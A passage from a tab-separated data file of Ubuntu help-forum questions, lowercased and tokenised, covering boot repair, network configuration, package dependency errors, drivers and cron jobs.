weeks to completely recover . any suggestions on how to get my windows boot partition back ? i do n't even care if grub ca n't find it . i 'd just like to be able to boot into windows at least from the bios . this is what my grub menu looks like : and my boot menu : and my windows partition viewed through ubuntu :
408542	do motorola droid work with ubuntu touch ?	i 'm wondering if one of my family 's old mobile devices will be able to handle ubuntu before i wipe my data clean . my hardware is the motorola droid bionic . i 'm very excited to start toying with ubuntu on mobile .
408546	virtual machine in two subnets	i 'm coming from networking where a router/switch has a separate interface for management . therefore i want to understand how this is implemented for servers/virtualized servers . i have one subnet for management ( remote access to the vm via ssh ) and another subnet for connecting the server to the service network . subnet 0 for management subnet 1 for webserver , ftp-server , syslog-server , radius ... is such a separation practical in server environment or is only a single subnet used to connect a server/virtualized server both for management and service access ? in my current setup , i have two bridges configured on the host and on the guest i have two eth-if ( eth0 to br0 and eth1 to br1 ) but this seems to not be sufficient because the guest needs to know which interface has to be used depending on the application . maybe i 'm totally wrong here and i 'm making it too complicated . any ideas or help would be great .
408547	upstart service not starting when a service it depends on starts	i have a service called service c. it has the following start and stop conditions : start on ( started a and started b ) stop on ( stopping a or stopping b ) when i manually stop a , c stops . however , when i start a , c does n't start unless i stopped and started b as well . i want c to run whenever a and b are both running , and the above conditions do n't achieve that . any ideas on what the start conditions should look like ? thanks !
408551	ubuntu 12.04 lts , gnome : sound mutes and unmutes 10 times a second	the problem with my ubuntu 12.04 lts system is that it seems like something other than me is controlling volume and mute status of my sounds . whenever a sound is playing , the volume icon in the bar goes between normal and mute icon about 10 times a second , and the sound i hear is according . and when i adjust the volume either with the keyboard buttons or with the slider that comes from the said volume icon , it seems like something is trying to put it back to where it was . it seems like everything 's ok when the volume level is below 25 % , so i was thinking maybe some kind of `` automatic volume level setting '' could be behind this , but i have n't seen anywhere an option to turn such a service on . the problem appears in gnome and also when no x is running . in the latter case , when i run alsamixer in the console , the volume bars jump between mute and unmute there as well ( but only while a sound is playing ) . pacmd list-clients |grep application.name application.name = `` consolekit session /org/freedesktop/consolekit/session2 '' application.name = `` gnome volume control media keys '' application.name = `` indicator sound '' application.name = `` xsmp session on gnome-session as 1013c4e19cf8151dec138928909599998800000018450036 '' application.name = `` metacity '' application.name = `` libcanberra '' application.name = `` alsa plug-in [ mpg123.bin ] '' application.name = `` unix socket client '' mpg123 is there because i was trying to play something while taking that list . other than mpg123 , the list is identical when no sound is playing . stopping , killing or uninstalling pulseaudio did not fix it . one more thing : the os is located at an external hard drive which i do n't use every day . i think the problem appeared suddenly one day , maybe as a result of routine package updates ?
408552	when i try to install any thing in ubuntu 12.04 i get this error	sudo apt-get install reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libjson0 : breaks : libjson0 : i386 ( ! = 0.10-1.2ubuntu2 ) but 0.9-1ubuntu1 is installed libjson0 : i386 : breaks : libjson0 ( ! = 0.9-1ubuntu1 ) but 0.10-1.2ubuntu2 is installed teamviewer : depends : lib32asound2 but it is not installed depends : lib32z1 but it is not installed e : unmet dependencies . try using -f. can any one help me over this
408553	is there a dell longevity option in ubuntu ?	dell xps has the following option in windows 8 : i assume it 's a hardware switch that is set somehow , so does it stick when rebooting to ubuntu ? is there a way to check or switch this option from linux ? i assume there 's a driver somewhere since dell makes the xps 13 , a linux-preinstalled version of the xps .
408554	xubuntu 13.10 display issue	i am having issues with xubuntu 13.10 installed on an old amd sempron machine with 2 gb ram . the top and bottom panels are not shown clearly and becomes very hard to read them . even text in a terminal window are not shown clearly . i have screenshots , but dont know how to attach them to this post . also , the maximum resolution supported is only 1024*768 . please help me with any pointers . output of lshw : vakilsearch @ vakilsearch-system-product-name : ~ $ sudo lshw -c video [ sudo ] password for vakilsearch : *-display unclaimed description : vga compatible controller product : rage xl pci vendor : advanced micro devices , inc. [ amd/ati ] physical id : 6 bus info : pci @ 0000:02:06.0 version : 27 width : 32 bits clock : 33mhz capabilities : pm vga_controller bus_master cap_list configuration : latency=64 mingnt=8 resources : memory : fb000000-fbffffff ioport : e000 ( size=256 ) memory : fafff000-faffffff memory : fafc0000-fafdffff output of lspci : vakilsearch @ vakilsearch-system-product-name : ~ $ lspci 00:00.0 host bridge : advanced micro devices , inc. [ amd ] rs780 host bridge 00:06.0 pci bridge : advanced micro devices , inc. [ amd ] rs780 pci to pci bridge ( pcie port 2 ) 00:11.0 sata controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 sata controller [ ide mode ] 00:12.0 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:12.1 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0 usb ohci1 controller 00:12.2 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ehci controller 00:13.0 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:13.1 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0 usb ohci1 controller 00:13.2 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ehci controller 00:14.0 smbus : advanced micro devices , inc. [ amd/ati ] sbx00 smbus controller ( rev 3a ) 00:14.1 ide interface : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 ide controller 00:14.2 audio device : advanced micro devices , inc. [ amd/ati ] sbx00 azalia ( intel hda ) 00:14.3 isa bridge : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 lpc host controller 00:14.4 pci bridge : advanced micro devices , inc. [ amd/ati ] sbx00 pci to pci bridge 00:14.5 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ohci2 controller 00:18.0 host bridge : advanced micro devices , inc. [ amd ] k8 [ athlon64/opteron ] hypertransport technology configuration 00:18.1 host bridge : advanced micro devices , inc. [ amd ] k8 [ athlon64/opteron ] address map 00:18.2 host bridge : advanced micro devices , inc. [ amd ] k8 [ athlon64/opteron ] dram controller 00:18.3 host bridge : advanced micro devices , inc. [ amd ] k8 [ athlon64/opteron ] miscellaneous control 01:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 02 ) 02:06.0 **vga compatible controller** : advanced micro devices , inc. [ amd/ati ] rage xl pci ( rev 27 )
408557	dropbox fails to start with `` verificationerror : importing pylinux ... ''	dropbox fails to start with `` verificationerror : importing pylinux ... '' . it seems that some recent python update breaks dropbox , resulting in the following error : starting dropbox ... traceback ( most recent call last ) : file `` dropbox/client/main.py '' , line 13 , in file `` autogen_explicit_imports.py '' , line 13 , in file `` ui/common/selective_sync.py '' , line 6 , in file `` arch/__init__.py '' , line 28 , in file `` arch/linux/tracing.py '' , line 8 , in file `` hard_trace.py '' , line 6 , in file `` client_api/connection_hub.py '' , line 21 , in file `` client_api/kv_connection.py '' , line 23 , in file `` pylinux/__init__.py '' , line 71 , in file `` cffi/api.py '' , line 311 , in verify file `` dropbox/overrides.py '' , line 398 , in load_library file `` cffi/verifier.py '' , line 69 , in load_library file `` cffi/verifier.py '' , line 154 , in _load_library file `` cffi/vengine_cpy.py '' , line 124 , in load_library verificationerror : importing '/home/maythux/pylinux/__pycache__/_cffi__xa0c4f46bx1d95b4de.so ' : no module named _cffi__xa0c4f46bx1d95b4de reinstalling dropbox does n't fix this issue . any idea ? !
408561	apache permission problem in ubuntu 12.04	i am new to ubuntu , i have install ubuntu 12.04 install in my system i have install localhost ( lamp ) in my system . i was trying to import a data base with more size so dor that i need to change the php.ini file which was there in /etc/php5/apache2/php.ini but php.ini file was in read onely mode so i change the permission of apache2 folder like chmod -r 777 apache2 and now i am not able to use php myadmin , can any 1 tell me what to do ? ? ? ? ? ? ? ? ? ? ? ? ? ?
408566	run mikogo on ubuntu 13.10	i 'm following instructions on mikogo website http : //www.mikogo.com/download/linux-download/ , but it does n't work . ./mikogo doing nothing . please , help .
408568	how to install nsigth eclipse as a remote application	i want to install nvidia nsight eclipse in my machine , but i dont have an nvidia card . my professor said that try to install it in a way that she can share the card through ssh . how ca i install it ? am using ubuntu 12.04 and i am new to ubuntu . please provide me a solution .
408569	kernel panic due to wi-fi adapter	i have a wi-fi adapter wlan 802.11a/b/g/n dual-band usb module model 236b from wistron neweb corp . i had no problem with connecting to network however after a short time there is a kernel panic and is always happening . please help me rectify this problem .
408571	unlock kde from bash	i am running kubuntu 13.10 x64 with no special settings . now i want to unlock the machine by ssh ( the kde screen lock ) . i tried this : http : //thebigbyte.blogspot.de/2010/05/how-to-lock-unlock-kde4-screensaver.html but just nothing happens ... thanks for help !
408575	where are the canon mf8080cw wireless drivers ?	i recently bought canon mf8080cw wireless printer and scanner but i am unable to find the drivers for it , i am using ubuntu 13.10 x64
408577	package manager	how can i solve this problem e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/deb.playonlinux.com_dists_precise_main_binary-amd64_packages , e : the package lists or status file could not be parsed or opened . i can not update softaware because my installed updates have unmet dependencies .
408579	internet is not working on vm	i have two nic configured between two servers one to connect server with internet and other is for fast internal connectivity of the servers each server have three vm 's each i have configured both the nic on all vm but ip is assign by dhcp on 172.26.43.1 vlan which is connected to internet but 10.10.10.1 is ip i am using for private network ( only for internal connectivity between all the other vm ) with no dhcp so i am assigning static ip when i assign static ip on vm from here internet stops working on my vm configuration on vm is /etc/network/interfaces auto eth1 iface eth1 inet static address 10.10.10.17 netmask 255.255.255.0 gateway 10.10.10.11 10.10.10.11 is the ip of the server on which vm is running ifconfig eth0 link encap : ethernet hwaddr 08:00:27 : e8:2e:19 inet addr:172.26.43.88 bcast:172.26.43.255 mask:255.255.255.0 inet6 addr : fe80 : :a00:27ff : fee8:2e19/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:55831 errors:0 dropped:0 overruns:0 frame:0 tx packets:1945 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:9126338 ( 9.1 mb ) tx bytes:158629 ( 158.6 kb ) eth1 link encap : ethernet hwaddr 08:00:27:68 : bd:91 inet addr:10.10.10.17 bcast:10.10.10.255 mask:255.255.255.0 inet6 addr : fe80 : :a00:27ff : fe68 : bd91/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:6 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:468 ( 468.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:16 errors:0 dropped:0 overruns:0 frame:0 tx packets:16 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1184 ( 1.1 kb ) tx bytes:1184 ( 1.1 kb ) route kernel ip routing table destination gateway genmask flags metric ref use iface default 172.26.43.1 0.0.0.0 ug 100 0 0 eth0 10.10.10.0 10.10.10.11 255.255.255.0 u 0 0 0 eth1 172.26.43.0 * 255.255.255.0 u 0 0 0 eth0
408580	possible to delete root partition	i was deleting a partition on my root drive through the disk utility , and now the disk utility shows my root disk is entirely free space . my system is still running and i can access all my files just fine - lsblk shows the partitions just as they should be . is it even possible to delete the root partition , or is this likely just a bug with the disk utility ?
408583	static ip address issue with ubuntu server 12.04	i gave a static ip address to my eth1 as follows : auto eth1 iface eth1 inet static address 192.168.xx.xx netmask 255.255.255.0 gateway 1xx.xx.xx i saved the file , and afterwards i did the following : sudo nano /etc/resolvconf/resolv.conf.d/base and wrote as below : nameserver 8.8.8.8 nameserver 8.8.8.4 and saved it . i am getting the below error when i try to down the ethernet adapter . /etc/network/interfaces :2 : misplaced option ifdown : could n't read interface file `` etc/network/interfaces '' then i restarted the server and upon starting i observed the below starting configure network devices -- - fail starting configure virtual devices -- -- fail but ... ... ! when i do the following everything works fine : sudo ifconfig eth1 192.168.xx.xx netmask 255.255.255.0 but these are temporary . another thing that puzzled me is after configuring a static ip i opened the /etc/network/interface but it was blank . strangely enough once i purge ip settings using ip addr flush eth1 , i can open the interface file , with all the static ip settings intact . any idea what 's going on ? i would appreciate all your help as i am literally `` dead in the water '' .
408584	caldav supported task reminder	is there a working calendar in gnu/linux that supports caldav , other than evolution and lightning ? - one that has native caldav support and desktop ( applet ) integration . neither dates nor orage calendar do support caldav . or will that ( possibly ) emerge with gnome v3 ?
408586	maas with virtual nodes	i want to create my own private cloud using ubuntu 12.04 metal as service for my research can i use one physical server and add virtual nodes inside it ? can i add 2 nodes and make virtual nodes inside those 2 ? and finally i want resources and documentation can help me doing that.. i already tried adding 2 physical nodes but i got many errors so i will restart my work thanks for any answer
408587	is there any program that can open files from sketch	sketch is an app that 's mac osx only . its used for ui design and my company uses it . i ca n't run the app in ubuntu . is there any program for ubuntu that can view these kind of file collections ? it 's basically a folder with a .sketch ending containing a `` data '' file with no ending and some other stuff .
408588	carddav supported address book	is there a working addressbook in gnu/linux that supports carddav , other than evolution ( not eds ) and lightning ( sogo connector ) ? - one that has native carddav support and desktop ( applet ) integration . contacts does not support carddav . or will that ( possibly ) emerge with gnome v3 ?
408590	show macchanger info in conky ?	is there a way to show macchanger info in conky ? i wrote a script that changes it on login , but i always double check when i start the computer using macchanger wlan0 -s i would like to show the output of this command into conky , if possible : ) thanks in advanced to anyone who can help ! ! !
408594	which is the application that i can open torrent files ?	when i 'm trying to download the torrent file to download some video , it was asking me select the application to open that torrent file . could you pelase help me on that
408595	ububtu 12.4 unity tray	i have working ubuntu 10.4 and installed 12.4 on a different pc . i try unity . in 10.4 it was comfortable to have firefox icon on the system try and i tried to put it on that of 12.4 . using alltray and gsettings set com.canonical.unity.panel systray-whitelist i could put there skype , but filed with firefox . more precisely : the close of firefox window put icon on the tray and next click on the icon started firefox , but with no window ( strange situation : firefox menu works , but windows arenât shown ) . kdocker in my situation gives the same - menus only -result . ok. donât put firefox on systray . i left out firefox from whitelist and got a working system with some missing functionalities . they are : no message before close multiple windows and no restore after crash . my questions : 1 ) is it possible to put firefox on systray for start as in 10.4 or at close only ? 2 ) how to restore lost functionality ? ( reinstall of firefox is not enough . ) thanks
408599	how do i make a seperate partition for my home folder ?	i 've herd of this referred to before and would love to know the process involved . i would also like to be able to encrypt my directoryâs .
408603	ubuntu 12.04 problem with internet connection , its very slow on lan and wifi	i have just installed ubuntu 12.04 and i am new to this operating system . i have a dual boot with window 7 . my internet connection speed is very good in windows 7 , when i test using speedtest.net it reaches a speed of around 10mbps but where as in ubuntu it shows some were between 1-1.5 mbps . this is the same either i connect by wifi or lan . i have installed all the packages like ubuntu extras . i request if some one can shower some light on this query , i really want to get this done . this is the wifi adapter : rtl8188ce
408604	ubuntu 13.04 laggs	ubuntu is been installed on my lenovo idea pad y510 13.04 for about a year now . recently it started to lag ( stops for milliseconds and the moves on again ) it is very irritant . what could be the cause of the problem ?
408605	what does dkms do ? how do i use it ?	i 've seen a few mentions about dkms recently but it 's not clear what it 's actually doing on my system . what does dkms actually do and how do i use it ?
408608	saving a apt-get file for future installations , how do i do it ?	i have a terribly limited download allowance and have multiple computers . so , my questions folks is . would i be able to save what has been installed thru apt-get and any other terminal installations i attempt ?
408611	how to remove or delete single cron job using linux command ?	i have created cron jobs for my site which is listed below and they are working fine.i print all cron job by using this command $ cronfiles=exec ( 'crontab -l ' , $ output ) ; echo `` < pre > '' ; print_r ( $ output ) ; [ 0 ] = > 0 0 * * * wget php -q http : //www.mysite.com/report_send.php [ 1 ] = > 0 0 * * * wget php -q http : //www.mysite.com/event_reminder.php [ 2 ] = > 0 0 * * * wget php -q http : //www.mysite.com/user_reminder.php [ 3 ] = > * * * * * wget php -q http : //www.mysite.com/cleardata.php now i want to delete or remove single cron job from my server through command . for example i want to remove cron job `` 0 0 * * * wget php -q http : //www.mysite.com/event_reminder.php '' from server . i tried crontab -r command which removes all cron job from my server but i want to remove specific cron job . can you please help me for solution ?
408612	xps 13 sputnik 3 ubuntu 12.04 live does n't load wireless driver	i 'm trying to install ubuntu 12.04 on a dell xps 13 but when i run the live version it does n't find any network devices . it has an intel corporation wireless 7260 network controller . this computer came with 12.04 pre-installed but i tried out an ubuntu 13.10 installation , and now i want to go back to 12.04 because i ca n't get the trackpad to work properly under 13.10 . is there some way i can load the wireless driver for this device during 12.04 installation ?
408613	dell xps15 l502x mini display port not working ubuntu 13.04	before i had ubuntu 12.10 running on this laptop and the mini display port worked . now i have ubuntu 13.04 and the mini display port does not work anymore . if i connect my external monitor using a vga to mini display port adapter ( as i did with ubuntu 12.10 too ) nothing at all happens . not even a flicker . i have bumblebee installed . lspci | grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf108m [ geforce gt 540m ] ( rev ff ) xrandr -q screen 0 : minimum 320 x 200 , current 1920 x 1080 , maximum 32767 x 32767 lvds1 connected 1920x1080+0+0 ( normal left inverted right x axis y axis ) 344mm x 193mm 1920x1080 60.0*+ 59.9 1680x1050 60.0 59.9 1600x1024 60.2 1400x1050 60.0 1280x1024 60.0 1440x900 59.9 1280x960 60.0 1360x768 59.8 60.0 1152x864 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) what can i try to make it work ? as far as i know , the mini display port is connected to the intel graphics card .
408615	how to quit sshuttle and get system networking back to normal in vbox	i love sshuttle . my new fav toy . but ... when i run from the command line and i use ctl-c to quit ... .my networking is screwed and i have to restart the vm . using 12.04 here is how i start from the command line to divert all traffic to a ec2 isntances using a ssh config file . ubuntu @ ubuntu : ~ $ sshuttle -r ec2-fff-fff-fff-fff.us-west-2.compute.amazonaws.com 0/0 ./ssh/config host *compute.amazonaws.com stricthostkeychecking no userknownhostsfile /dev/null user ubuntu identityfile /home/ubuntu/.ec2/aws_development_oregon.pem now ... in the terminal ... i use ctrl-c to kill the tunnel . but ... how to a failsafe reset from the command line without having to restart the vbox ? thanks
408617	ubuntu minimal cd installs grub to usb drive	the installation goes fine , but when it comes to the grub installation , the installer tries to put it on the usb drive . for some reason , the usb drive is detected as /dev/sda and the hdd is at /dev/sdb . i tried answering `` no '' to the `` install grub boot loader to the master boot record '' . it allows me to enter where grub should be installed , however , when i start typing , what appears is garbage and not letters - some distorted symbols and that 's all . what should i do ? edit : found a solution here : link however , i 'm not sure whether this is the right way to do it . is it okay to install it like this ?
408622	how to find my files	so this is the first time i 'm using linux , and i ca n't quite figure it all out . the only issue i 'm having is that i can not find the files i had from when i was using windows . can someone help me out with this ?
408624	software-catalogue can not be repaired	after updating my system , im getting problems installing a plugin for google+ the softwarecenter does n't repair it self and so can not update the plugin . there seems to be a problem with software package between digikam and kipi , how can i deinstall which ( ! ) package ? thanks for your help full description here : installarchives ( ) failed : dpkg : dependency problems prevent configuration of kipi-plugins-common : digikam-data ( 4:3.3.0-0ubuntu1~ubuntu12.04+kde4.11~ppa1 ) breaks kipi-plugins-common ( < < 4:3.1.0-2~ ) and is installed . version of kipi-plugins-common to be configured is 4:3.1.0-0ubuntu1~ubuntu12.04.2~ppa1 . kipi-plugins ( 4:3.3.0-0ubuntu1~ubuntu12.04+kde4.11~ppa1 ) breaks kipi-plugins-common ( < < 4:3.1.0-3ubuntu1~ ) and is unpacked but not configured . version of kipi-plugins-common to be configured is 4:3.1.0-0ubuntu1~ubuntu12.04.2~ppa1 . dpkg : error processing kipi-plugins-common ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of kipi-plugins : kipi-plugins depends on kipi-plugins-common ( = 4:3.3.0-0ubuntu1~ubuntu12.04+kde4.11~ppa1 ) ; however : version of kipi-plugins-common on system is 4:3.1.0-0ubuntu1~ubuntu12.04.2~ppa1 . dpkg : error processing kipi-plugins ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : kipi-plugins-common kipi-plugins error in function : dpkg : dependency problems prevent configuration of kipi-plugins : kipi-plugins depends on kipi-plugins-common ( = 4:3.3.0-0ubuntu1~ubuntu12.04+kde4.11~ppa1 ) ; however : version of kipi-plugins-common on system is 4:3.1.0-0ubuntu1~ubuntu12.04.2~ppa1 . dpkg : error processing kipi-plugins ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of kipi-plugins-common : digikam-data ( 4:3.3.0-0ubuntu1~ubuntu12.04+kde4.11~ppa1 ) breaks kipi-plugins-common ( < < 4:3.1.0-2~ ) and is installed . version of kipi-plugins-common to be configured is 4:3.1.0-0ubuntu1~ubuntu12.04.2~ppa1 . kipi-plugins ( 4:3.3.0-0ubuntu1~ubuntu12.04+kde4.11~ppa1 ) breaks kipi-plugins-common ( < < 4:3.1.0-3ubuntu1~ ) and is unpacked but not configured . version of kipi-plugins-common to be configured is 4:3.1.0-0ubuntu1~ubuntu12.04.2~ppa1 . dpkg : error processing kipi-plugins-common ( -- configure ) : dependency problems - leaving unconfigured
408625	hp envy 15 j069-sf , trying to dual boot win8 and ubuntu 12.04lts , multiple struggle	i have a hp envy 15 j069sf , on which i must dual boot windows 8 ( .1 ) and ubuntu > 12.04 . it came with windows 8.1 pre-installed , i used gparted to erase all the disk and install windows 8.1 myself on 1/3 of the disk . then i heard ubuntu don t goes well with uefi , so i used gparted anew to erase all disk , and installed windows 8 in legacy mode ( not booted from efi file , legacy mode activated in bios ) . then i goes to ubuntu download , i took 12.04 because it is lts , and even if my computer is x64 , ubuntu.com redirect me on 32bit i386 version automatically . since i know i m not on a amd64 , i thought it was for compatibility , and i don t care the few 64bit advantage i lost by installing in 32bit , so i downloaded it . when booting ubuntu from efi file , it start to load then freeze , and when i boot it directly the disk is shown empty , even if i have two ntfs patition on 2/3 of the disk ! so my question is : why do the disk is shown empty in the ubuntu installer ( 750gb free , it s the size of the hard disk ) . nb : i can reinstall windows if needed , i have access to windows 7 , 8 , 8.1 in pro version . i am trying to download the latest ubuntu right now , see if it change anything . strangely , it take me on the amd64 download ... edit : ubuntu 13.10 amd64 don t detect my partitions either , trying with 12.04lts amd64
408627	usb-to-serial device , why no /dev entry ?	i initially asked this question on su but it is so specific to ubuntu that i move it here . i installed an 433mhz transceiver on my ubuntu system ( 3.8.0-35 ) . it is an usb-to-serial kind of device and is somehow recognized : dmesg output : [ 324.051498 ] usb 3-1 : new full-speed usb device number 2 using xhci_hcd [ 324.088070 ] usb 3-1 : new usb device found , idvendor=10c4 , idproduct=8668 [ 324.088081 ] usb 3-1 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 324.088087 ] usb 3-1 : product : netusb1100 newmsg [ 324.088093 ] usb 3-1 : manufacturer : hzwb [ 324.102259 ] hid-generic 0003:10c4:8668.0002 : hiddev0 , hidraw1 : usb hid v1.01 device [ hzwb netusb1100 newmsg ] on usb-0000:0e:00.0-1/input0 lsusb output : bus 003 device 002 : id 10c4:8668 cygnal integrated products , inc . i would like to access it ( via rfxcmd for instance ) but i can not get a relevant /dev path . the contents of /dev do not change when i plug it in so there is certainly something missing . what other steps must be done in order to create a /dev/ ... device path - which can be then used in scripts ? edit after lekensteyn 's answer : output of tree /sys/bus/usb/drivers/ following a modprobe cp210x ( with non-relevant parts removed ) . please note that following a reboot the 3-1 above became a 3-2 below . i took that into account in the tests . /sys/bus/usb/drivers/ ├── cp210x │ ├── bind │ ├── module - > ../../../../module/usbserial │ ├── uevent │ └── unbind ├── hub │ ├── 1-0:1.0 - > ../../../../devices/pci0000:00/0000:00:1a.0/usb1/1-0:1.0 │ ├── 1-1:1.0 - > ../../../../devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1:1.0 │ ├── 2-0:1.0 - > ../../../../devices/pci0000:00/0000:00:1d.0/usb2/2-0:1.0 │ ├── 2-1:1.0 - > ../../../../devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1:1.0 │ ├── 3-0:1.0 - > ../../../../devices/pci0000:00/0000:00:1c.6/0000:0e:00.0/usb3/3-0:1.0 │ ├── 4-0:1.0 - > ../../../../devices/pci0000:00/0000:00:1c.6/0000:0e:00.0/usb4/4-0:1.0 │ ├── bind │ ├── module - > ../../../../module/usbcore │ ├── new_id │ ├── remove_id │ ├── uevent │ └── unbind ├── usb │ ├── 1-1 - > ../../../../devices/pci0000:00/0000:00:1a.0/usb1/1-1 │ ├── 1-1.2 - > ../../../../devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.2 │ ├── 1-1.3 - > ../../../../devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.3 │ ├── 1-1.4 - > ../../../../devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.4 │ ├── 1-1.6 - > ../../../../devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.6 │ ├── 2-1 - > ../../../../devices/pci0000:00/0000:00:1d.0/usb2/2-1 │ ├── 3-2 - > ../../../../devices/pci0000:00/0000:00:1c.6/0000:0e:00.0/usb3/3-2 │ ├── bind │ ├── uevent │ ├── unbind │ ├── usb1 - > ../../../../devices/pci0000:00/0000:00:1a.0/usb1 │ ├── usb2 - > ../../../../devices/pci0000:00/0000:00:1d.0/usb2 │ ├── usb3 - > ../../../../devices/pci0000:00/0000:00:1c.6/0000:0e:00.0/usb3 │ └── usb4 - > ../../../../devices/pci0000:00/0000:00:1c.6/0000:0e:00.0/usb4 ├── usbhid │ ├── 1-1.2:1.0 - > ../../../../devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.2/1-1.2:1.0 │ ├── 3-2:1.0 - > ../../../../devices/pci0000:00/0000:00:1c.6/0000:0e:00.0/usb3/3-2/3-2:1.0 │ ├── bind │ ├── module - > ../../../../module/usbhid │ ├── new_id │ ├── remove_id │ ├── uevent │ └── unbind ├── usbserial │ ├── bind │ ├── module - > ../../../../module/usbserial │ ├── uevent │ └── unbind ├── usbserial_generic │ ├── bind │ ├── module - > ../../../../module/usbserial │ ├── uevent │ └── unbind edit : added dmesg after cp210x.ko recompilation and reboot ( with the new cp210x.ko ) [ 1.352918 ] usb 3-2 : new full-speed usb device number 2 using xhci_hcd [ 1.389854 ] usb 3-2 : new usb device found , idvendor=10c4 , idproduct=8668 [ 1.389865 ] usb 3-2 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 1.389871 ] usb 3-2 : product : netusb1100 newmsg [ 1.389877 ] usb 3-2 : manufacturer : hzwb [ 1.399869 ] usbcore : registered new interface driver usbhid [ 1.399872 ] usbhid : usb hid core driver [ 1.406870 ] hid-generic 0003:10c4:8668.0001 : hiddev0 , hidraw0 : usb hid v1.01 device [ hzwb netusb1100 newmsg ] on usb-0000:0e:00.0-2/input0 after a manual modprobe cp210x , the extra lines in dmesg . [ 1313.312593 ] usbcore : registered new interface driver usbserial [ 1313.312642 ] usbcore : registered new interface driver usbserial_generic [ 1313.312674 ] usbserial : usb serial support registered for generic [ 1313.329536 ] usbcore : registered new interface driver cp210x [ 1313.329575 ] usbserial : usb serial support registered for cp210x ( end of file )
408631	ubuntu to replace android on my asus padfone infinity	it has been nearly a year since any one asked about this so hopefully things have gotten updated by now . i have the asus padfone infinity and would like to replace android with unbutu . is this possible now - i read other questions from last may about basically the same thing . regards frank
408632	unable to change username	i have been using ubuntu since 3 years , i have learnt a lot from it . i loaded ubuntu and never formatted , but now i wanted to rename my username by usermod -l atif malik manchester but im unable to . how can i do that ?
408633	kernel panic on dpkg -a -- configure	i got 'kernel panic ' error when run dpkg -a -- configure . error says kernel panic - not syncing : attempted to kill init ! dpkg.log says : ... 2014-01-20 10:41:57 status unpacked libc-bin : amd64 2.18-0ubuntu6 2014-01-20 10:41:57 upgrade libc6 : i386 2.18-0ubuntu4 2.18-0ubuntu6 2014-01-20 10:41:57 status half-configured libc6 : i386 2.18-0ubuntu4 2014-01-20 10:41:57 status unpacked libc6 : i386 2.18-0ubuntu4 2014-01-20 10:41:58 status half-configured libc6 : amd64 2.18-0ubuntu4 2014-01-20 10:41:58 status half-installed libc6 : i386 2.18-0ubuntu4 2014-01-20 10:41:59 status half-installed libc6 : i386 2.18-0ubuntu4 2014-01-20 10:41:59 status unpacked libc6 : i386 2.18-0ubuntu6 2014-01-20 10:41:59 status unpacked libc6 : i386 2.18-0ubuntu6
408634	uninstall tata photon plus	i have installed tata photon plus modem previously . now i do n't want to use it . i tried to uninstall , when i click on `` uninstall photon plus '' in dash its appearing `` you must run the process by root '' . i tried already with these 2 commands , showing some error messages sudo apt-get remove photon sudo apt-get purge photon
408635	deploy havana to two nodes	hello what should i do to deploy openstack havana to two nodes ... i have tryed everything but get only error 500 when i try to get to the dashboard . i use - quantum , cinder , glance , nova-compute-nova-cloud-controller , keystone , openstack-dashboard , mysql , rabbitmq-server ... i deploy -- to 0 -- > juju-gui and -- to 1 openstack-dashboard . i put in nova-cloud-controller -- > quantum and as openstack-origin - cloud : precise-havana . is there everything else ? thanks
408637	how do i disable the automatic superscripting of numbers ?	i am writing my thesis and it is highly annoying that i need to type a space after ^ if i want to write a^2 instead of aâ˛ . i am using latex and other software that do not understand aâ˛ . is it possible to disable this feature somewhere ? i have had no luck in my research so far . i am using ubuntu 13.10 .
